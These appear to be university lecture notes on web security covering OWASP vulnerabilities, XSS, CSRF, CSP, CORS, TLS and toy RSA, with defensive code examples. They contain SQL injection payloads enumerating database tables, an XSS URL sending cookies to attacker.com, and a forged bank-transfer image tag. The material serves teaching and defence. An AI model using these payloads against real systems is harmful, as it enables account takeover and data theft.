# CMP 5006 - Information Security 


## Web Security


### Alejandro Proano, PhD. 

## Introduction to Web Security

- Web security protects websites, web applications, and web services
- Crucial as business and personal activities shift online
- Involves protecting both client-side and server-side components
- Evolving threat landscape requires continuous learning


## Web Security Landscape

- In 2022, web application attacks increased by 251% (Source: Akamai)
- Average cost of a data breach: $4.35 million (IBM Cost of a Data Breach Report 2022)
- 50% of all data breaches involved web applications


## Real-world Application: 2017 Equifax Breach

- Vulnerability: Unpatched Apache Struts framework (CVE-2017-5638)
- Impact: 147 million people's personal data exposed
- Cost: $700 million settlement
- Lesson: Patch management is critical

Reference: [FTC Equifax Data Breach Settlement](https://www.ftc.gov/enforcement/refunds/equifax-data-breach-settlement)


## Real-world Application: GitHub's CSP Journey

- Incrementally deployed CSP to protect against XSS
- Used report-only mode first to identify legitimate use cases
- Iteratively strengthened policy while maintaining functionality

Reference: [GitHub's CSP Journey](https://github.blog/2017-01-19-github-security-update-content-security-policy/)


## Common Web Vulnerabilities: OWASP Top 10

1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfigurations
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring


```python
# Vulnerable pattern: the user-supplied value is spliced straight into the SQL text
user = input()
"SELECT * FROM users WHERE username = '{}'".format(user)
```

```python
# Expected input
user = "admin"
"SELECT * FROM users WHERE username = 'admin'"

# Injected input: the quote closes the string literal, OR 1=1 makes the
# WHERE clause always true, and -- comments out the rest of the query
user = "admin' OR 1=1--"
"""
SELECT first_name, surname
FROM users
WHERE username = 'admin' OR 1=1
UNION SELECT information_schema.table_name
FROM information_schema.tables--'
"""

# Further payloads from the notes
# admin' OR 1=1 UNION SELECT COLUMN_NAME, table_name FROM information_schema.COLUMNS WHERE table_schema='dvwa'#
# admin' OR 1=1 UNION SELECT name, comment FROM guestbook#
```


## Injection Vulnerabilities

- SQL, NoSQL, OS, and LDAP injection
- Occurs when untrusted data is sent as part of a command or query
- Example SQL injection:

```sql
-- Vulnerable code
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";

-- Attack input
username: admin' --
password: anything
```

- Result: Authentication bypass


## Cross-Site Scripting (XSS)

- Occurs when applications include untrusted data in web pages
- Three main types:
  - Reflected XSS
  - Stored XSS
  - DOM-based XSS
- Allows attackers to execute scripts in victims' browsers


## XSS Example

```html
<!-- Vulnerable code -->
<div>Welcome, <?php echo $_GET['name']; ?>!</div>

<!-- Attack URL -->
https://example.com/welcome.php?name=<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>
```

- Impact: Cookie theft, session hijacking, phishing
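The same page rendered with and without output encoding, as an added Python example (the slide's own code is PHP). The payload is the one from the attack URL above, embedded here as a constructed test input; `html.escape` is the standard-library encoder for the HTML element context.

```python
from html import escape

# Constructed test input: the script from the slide's attack URL
PAYLOAD = ("<script>document.location='https://attacker.com/steal.php?cookie='"
           "+document.cookie</script>")

def render_welcome_vulnerable(name):
    # Equivalent of the PHP on the slide: the parameter is echoed verbatim, so any
    # markup it contains is parsed by the browser as part of the page
    return f"<div>Welcome, {name}!</div>"

def render_welcome_safe(name):
    # Encode for the HTML element context: < > & " ' become entities, so the
    # browser shows the payload as text instead of executing it.
    # Other contexts (attribute values, JavaScript, URLs) need their own encoders.
    return f"<div>Welcome, {escape(name, quote=True)}!</div>"
```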


## Cross-Site Request Forgery (CSRF)

- Forces authenticated users to execute unwanted actions
- Leverages the fact that browsers send cookies with every request



## CSRF Example

```html
<!-- Malicious website content -->
<img src="https://bank.com/transfer?to=attacker&amount=1000" style="display:none" />
```

When a logged-in victim visits the malicious site, their browser makes the request with their authentication cookies.
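Why the hidden-image request above fails against a properly built endpoint, as an added example that is not part of the slides. The session store, the `/transfer` handler and its argument names are constructed for the demonstration; in a real application the session id comes from the cookie and the form fields from the request body.

```python
import hmac
import secrets

# Constructed stand-in for the server-side session store
sessions = {}

def new_session():
    sid = secrets.token_urlsafe(16)
    # One unguessable token per session; the forged <img> request cannot know it
    sessions[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid

def render_transfer_form(sid):
    # The legitimate form carries the token; cross-site pages cannot read it (SOP)
    token = sessions[sid]["csrf_token"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"></form>')

def handle_transfer(sid, method, form):
    if sid not in sessions:
        return 401
    if method != "POST":
        return 405  # state changes only via POST: the <img> GET is rejected outright
    if not hmac.compare_digest(form.get("csrf_token", ""), sessions[sid]["csrf_token"]):
        return 403  # constant-time compare; missing or wrong token is refused
    return 200
# Defence in depth: set the session cookie with SameSite=Lax or Strict so the
# browser does not attach it to cross-site requests in the first place.
```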


## Content Security Policy (CSP)

- Security layer that helps detect and mitigate certain attacks
- Controls the resources the browser is allowed to load
- Implemented via HTTP header or meta tag

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;
```
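How a browser applies the header above to the injected inline script from the XSS slide, as an added example (not code from the slides). The evaluator is deliberately simplified: it handles `'self'`, `'unsafe-inline'` and `scheme://host` sources only, not wildcards, paths, nonces or hashes; the page origin passed in is an assumption.

```python
from urllib.parse import urlsplit

SLIDE_HEADER = "default-src 'self'; script-src 'self' https://trusted-cdn.com;"

def parse_csp(header):
    # Directives are separated by ';'; each is a name followed by source expressions
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy

def script_allowed(policy, page_origin, script_source):
    # script-src governs <script> loads; default-src is the fallback when it is absent.
    # script_source is "inline" for an inline <script> block, otherwise the script URL.
    sources = policy.get("script-src", policy.get("default-src", []))
    if script_source == "inline":
        # Without 'unsafe-inline' the injected <script>...</script> never runs
        return "'unsafe-inline'" in sources
    parts = urlsplit(script_source)
    script_origin = f"{parts.scheme}://{parts.netloc}"
    for src in sources:
        if src == "'self'" and script_origin == page_origin:
            return True
        if not src.startswith("'") and src == script_origin:
            return True
    return False
```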


## Same-Origin Policy and CORS

- Same-Origin Policy (SOP): Security mechanism restricting how documents/scripts interact
- Cross-Origin Resource Sharing (CORS): Controlled relaxation of SOP

```http
Access-Control-Allow-Origin: https://trusted-domain.com
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: X-Custom-Header
```
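Producing the headers above only for an allow-listed origin, as an added example that is not part of the slides. The allow-list and the reflecting anti-pattern beside it are constructed for the demonstration; the point is that the match must be on the whole origin (scheme, host and port), never a prefix or substring.

```python
from urllib.parse import urlsplit

# Assumed allow-list; origins are compared as exact strings
ALLOWED_ORIGINS = {"https://trusted-domain.com"}

def cors_headers_reflecting(request_origin):
    # Weak setting: echoing whatever Origin arrives grants every site cross-origin
    # read access, which is the relaxation of SOP in its most dangerous form
    if request_origin is None:
        return {}
    return {"Access-Control-Allow-Origin": request_origin}

def cors_headers(request_origin):
    # Corrected: exact match on scheme://host[:port]. This rejects
    # https://trusted-domain.com.evil.example, http://trusted-domain.com and
    # any Origin value carrying a path, none of which are the trusted origin.
    if request_origin is None:
        return {}
    parts = urlsplit(request_origin)
    origin = f"{parts.scheme}://{parts.netloc}"
    if origin != request_origin or origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Methods": "GET, POST",
        "Access-Control-Allow-Headers": "X-Custom-Header",
        "Vary": "Origin",  # caches must key on Origin when the answer is per-origin
    }
```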


## Authentication Best Practices

1. Multi-factor authentication
2. Password policies 
3. Secure session management
4. Account lockout policies
5. Secure password storage (bcrypt, Argon2)


## HTTPS and TLS

- HTTPS = HTTP over TLS (Transport Layer Security)
- Provides:
  - Authentication
  - Data integrity
  - Confidentiality


$\text{HTTPS Security} = \min(\text{Certificate strength}, \text{Cipher strength}, \text{Key exchange strength})$



## Web Application Firewalls (WAF)

- Filter, monitor, and block HTTP traffic
- Protect against attacks like XSS, CSRF, SQLi
- Can use signature-based, anomaly-based, or reputation-based detection


## Modern Authentication Frameworks

- OAuth 2.0
- OpenID Connect
- FIDO2/WebAuthn
- Time-based complexity for WebAuthn registration

Reference: [FIDO Alliance](https://fidoalliance.org/specifications/)


## Security Testing Tools

1. Dynamic Application Security Testing (DAST)
   - OWASP ZAP
   - Burp Suite
2. Static Application Security Testing (SAST)
   - SonarQube
   - GitHub CodeQL
3. Interactive Application Security Testing (IAST)
   - Contrast Security
   - Checkmarx


```python
# Toy RSA walk-through: p here is the message (not a prime), n the modulus
p = 1234567
n = 173*61          # 10553, so the message is larger than the modulus

pr = 73             # exponent used to encrypt
pb = 3817           # matching exponent used to decrypt: 73 * 3817 = 1 (mod (173-1)*(61-1))

n
# 10553

c = pow(p, pr, n)
print(c)
# 6563

print(pow(c, pb, n))
# 10419  (this is p % n: because p >= n, decryption recovers p mod n, not p)

c**pb % n           # same result, computed without modular exponentiation
# 10419
```

```python
def gcd(a, b):
    while b:
        a, b = b, a % b
    return a

def mod_inverse(e, phi):
    # Extended Euclid: returns d with e * d = 1 (mod phi)
    def egcd(a, b):
        if a == 0:
            return (b, 0, 1)
        else:
            g, y, x = egcd(b % a, a)
            return (g, x - (b // a) * y, y)

    g, x, _ = egcd(e, phi)
    if g != 1:
        raise Exception('Modular inverse does not exist')
    else:
        return x % phi

def generate_keypair(p, q, e):
    # Calculate n and phi
    n = p * q
    phi = (p-1) * (q-1)

    # Calculate d
    d = mod_inverse(e, phi)

    return ((n, e), (n, d))

generate_keypair(173, 61, 107)
# ((10553, 107), (10553, 7523))

def encrypt(pk, plaintext):
    n, e = pk
    cipher = pow(plaintext, e, n)
    return cipher

def decrypt(pk, ciphertext):
    n, d = pk
    plain = pow(ciphertext, d, n)
    return plain

# Example usage

public_key, private_key = generate_keypair(173, 61, 71)

message = 1234

print("Original Message:", message)

ciphertext = encrypt(public_key, message)
print("Encrypted Message:", ciphertext)

decrypted_message = decrypt(private_key, ciphertext)
print("Decrypted Message:", decrypted_message)

# Original Message: 1234
# Encrypted Message: 10540
# Decrypted Message: 1234
```
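The two checks the scratch cells above leave implicit (e coprime to phi, and message smaller than n), as an added example that is not part of the notebook. It reproduces the notebook's numbers with the same toy primes, using Python's built-in `pow(e, -1, phi)` (3.8+) in place of the notebook's `mod_inverse`.

```python
from math import gcd

def rsa_keypair(p, q, e):
    # Textbook RSA with the notebook's toy primes 173 and 61
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse, same value mod_inverse returns
    return (n, e), (n, d)

def message_fits(pk, m):
    # RSA only round-trips for 0 <= m < n; anything larger is reduced mod n
    return 0 <= m < pk[0]

def rsa_encrypt(pk, m):
    if not message_fits(pk, m):
        raise ValueError("message must satisfy 0 <= m < n")
    n, e = pk
    return pow(m, e, n)

def rsa_decrypt(sk, c):
    n, d = sk
    return pow(c, d, n)

def wraparound(p, q, e, m):
    # What the notebook observed: encrypting m >= n without the check and
    # decrypting gives back m % n (1234567 % 10553 == 10419), not m
    pk, sk = rsa_keypair(p, q, e)
    n, e = pk
    return rsa_decrypt(sk, pow(m, e, n))
```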


```python
import numpy as np

np.log2(26)       # bits per symbol drawn uniformly from a 26-letter alphabet
# 4.700439718141092

np.log2(1/52)     # log2 of a probability of 1/52: minus the bits in one such choice
# -5.700439718141092
```